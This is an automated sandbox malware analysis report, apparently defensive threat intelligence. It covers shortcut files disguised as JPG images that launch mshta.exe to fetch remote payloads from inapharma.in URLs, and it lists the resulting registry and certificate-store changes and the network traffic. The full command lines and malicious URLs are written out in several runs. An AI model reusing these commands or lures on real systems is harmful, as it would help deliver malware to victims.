Malware Analysis Report

2024-10-19 06:17

Sample ID 220322-pth4vsfah3
Target 1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c
SHA256 1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c
Tags
persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c

Threat Level: Known bad

The file 1af2c8d963b56512e04a7f2136b3794f4172ae089e72880119e6bcdba4e9df9c was found to be: Known bad.

Malicious Activity Summary

persistence

Blocklisted process makes network request

Checks computer location settings

Adds Run key to start application

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-03-30 11:29

Signatures

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220310-en

Max time kernel

298s

Max time network

1218s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_160548.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1800 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1800 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1800 wrote to memory of 1988 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_160548.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_160548

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/1800-54-0x000007FEFC061000-0x000007FEFC063000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win10v2004-en-20220113

Max time kernel

231s

Max time network

714s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_160548.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1924 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1924 wrote to memory of 2708 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG_20210628_160548.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Sunakshi/IMG_20210628_160548

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/2708-131-0x00007FF8F6B90000-0x00007FF8F7651000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220311-en

Max time kernel

301s

Max time network

1218s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210911131002.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2199625441-3471261906-229485034-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 792 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 792 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 792 wrote to memory of 1036 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210911131002.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image7

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.30.182:80 crl.comodoca.com tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 104.18.30.182:80 crl.usertrust.com tcp
US 104.18.31.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp

Files

memory/792-54-0x000007FEFC471000-0x000007FEFC473000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win10v2004-en-20220113

Max time kernel

218s

Max time network

706s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20201210342791.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1576 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 1576 wrote to memory of 2772 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20201210342791.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image3

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.usertrust.com udp
US 104.18.30.182:80 crl.usertrust.com tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 106.89.54.20.in-addr.arpa udp

Files

memory/2772-131-0x00007FFE864E0000-0x00007FFE86FA1000-memory.dmp

memory/2772-132-0x000001F5D6830000-0x000001F5D68ED000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win7-20220310-en

Max time kernel

28s

Max time network

852s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210588270623.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2932610838-281738825-1127631353-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 792 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 792 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 792 wrote to memory of 1160 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210588270623.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image4

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 8.8.8.8:53 crl.comodoca.com udp
US 104.18.30.182:80 crl.comodoca.com tcp

Files

memory/792-54-0x000007FEFBCC1000-0x000007FEFBCC3000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:57

Platform

win10v2004-en-20220113

Max time kernel

214s

Max time network

702s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210588270623.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3432 wrote to memory of 3524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 3432 wrote to memory of 3524 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210588270623.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image4

Network

Country Destination Domain Proto
US 8.8.8.8:53 inapharma.in udp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 162.144.86.32:443 inapharma.in tcp
US 72.21.81.240:80 tcp
US 72.21.81.240:80 tcp

Files

memory/3524-131-0x000001FCB2CA0000-0x000001FCB3761000-memory.dmp

memory/3524-132-0x000001FCCD806000-0x000001FCCD807000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2022-03-22 12:37

Reported

2022-03-22 12:58

Platform

win10v2004-20220310-en

Max time kernel

209s

Max time network

703s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210743209813.jpg.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A
N/A N/A C:\Windows\System32\mshta.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Windows\System32\mshta.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Windows\System32\mshta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4252 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe
PID 4252 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\mshta.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\samples\IMG20210743209813.jpg.lnk

C:\Windows\System32\mshta.exe

"C:\Windows\System32\mshta.exe" https://inapharma.in/css/files/photos/Radhika-Images/Image6

Network

Country Destination Domain Proto
US 8.238.20.254:80 tcp
US 8.238.20.254:80 tcp
US 8.8.8.8:53 inapharma.in udp
